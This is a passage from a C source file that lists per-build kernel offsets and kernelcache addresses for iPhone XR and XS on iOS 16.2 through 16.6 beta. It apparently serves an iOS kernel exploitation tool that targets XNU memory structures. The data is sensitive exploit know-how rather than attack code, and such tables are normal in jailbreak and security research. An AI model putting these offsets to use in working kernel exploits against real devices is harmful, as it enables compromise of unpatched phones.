.kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0f5178, .kernelcache__gPhysBase = 0xfffffff0077ffd48, .kernelcache__gPhysSize = 0xfffffff0077ffd48 + 0x8, .kernelcache__gVirtBase = 0xfffffff0077fdf28, .kernelcache__perfmon_devices = 0xfffffff00a130380, .kernelcache__perfmon_dev_open = 0xfffffff007e3b398, .kernelcache__ptov_table = 0xfffffff0077b3288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a12f800, .kernelcache__vm_pages = 0xfffffff0077b00c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077b2248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a12f7f8, .kernelcache__vn_kqfilter = 0xfffffff007e8da20, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E247", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a1a9208, .kernelcache__gPhysBase = 0xfffffff0078d7fa0, .kernelcache__gPhysSize = 0xfffffff0078d7fa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078d6178, .kernelcache__perfmon_devices = 0xfffffff00a1e7500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff00788b160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1e6990, .kernelcache__vm_pages = 0xfffffff007887ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788a110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1e6988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a1a9208, .kernelcache__gPhysBase = 0xfffffff0078d7fa0, .kernelcache__gPhysSize = 0xfffffff0078d7fa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078d6178, .kernelcache__perfmon_devices = 0xfffffff00a1e7500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff00788b160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1e6990, .kernelcache__vm_pages = 0xfffffff007887ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788a110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1e6988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a1b1288, .kernelcache__gPhysBase = 0xfffffff0078dc0e0, .kernelcache__gPhysSize = 0xfffffff0078dc0e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078da2b8, .kernelcache__perfmon_devices = 0xfffffff00a1ef500, .kernelcache__perfmon_dev_open = 0xfffffff007e59c8c, .kernelcache__ptov_table = 0xfffffff00788f160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1ee990, .kernelcache__vm_pages = 0xfffffff00788bea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1ee988, .kernelcache__vn_kqfilter = 0xfffffff007ea8ad8, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a249ab0, .kernelcache__gPhysBase = 0xfffffff0078ec288, .kernelcache__gPhysSize = 0xfffffff0078ec288 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078ea440, .kernelcache__perfmon_devices = 0xfffffff00a289530, .kernelcache__perfmon_dev_open = 0xfffffff007e7a434, .kernelcache__ptov_table = 0xfffffff00789f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a288910, .kernelcache__vm_pages = 0xfffffff00789c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00789e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a288908, .kernelcache__vn_kqfilter = 0xfffffff007ec8c44, }, // End iPhone XR // // Start iPhone XS // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPhone11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a235178, .kernelcache__gPhysBase = 0xfffffff00781fc60, .kernelcache__gPhysSize = 0xfffffff00781fc60 + 0x8, .kernelcache__gVirtBase = 0xfffffff00781de40, .kernelcache__perfmon_devices = 0xfffffff00a270380, .kernelcache__perfmon_dev_open = 0xfffffff007e773ac, .kernelcache__ptov_table = 0xfffffff0077d3248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a26f800, .kernelcache__vm_pages = 0xfffffff0077d0080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077d2208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a26f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a44, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPhone11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a239178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a274380, .kernelcache__perfmon_dev_open = 0xfffffff007e77398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a273800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2737f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a20, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPhone11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a239178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a274380, .kernelcache__perfmon_dev_open = 0xfffffff007e77398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a273800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2737f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a20, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E247", .device_id = "iPhone11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a309208, .kernelcache__gPhysBase = 0xfffffff0078f7fa0, .kernelcache__gPhysSize = 0xfffffff0078f7fa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078f6178, .kernelcache__perfmon_devices = 0xfffffff00a347500, .kernelcache__perfmon_dev_open = 0xfffffff007e99a88, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 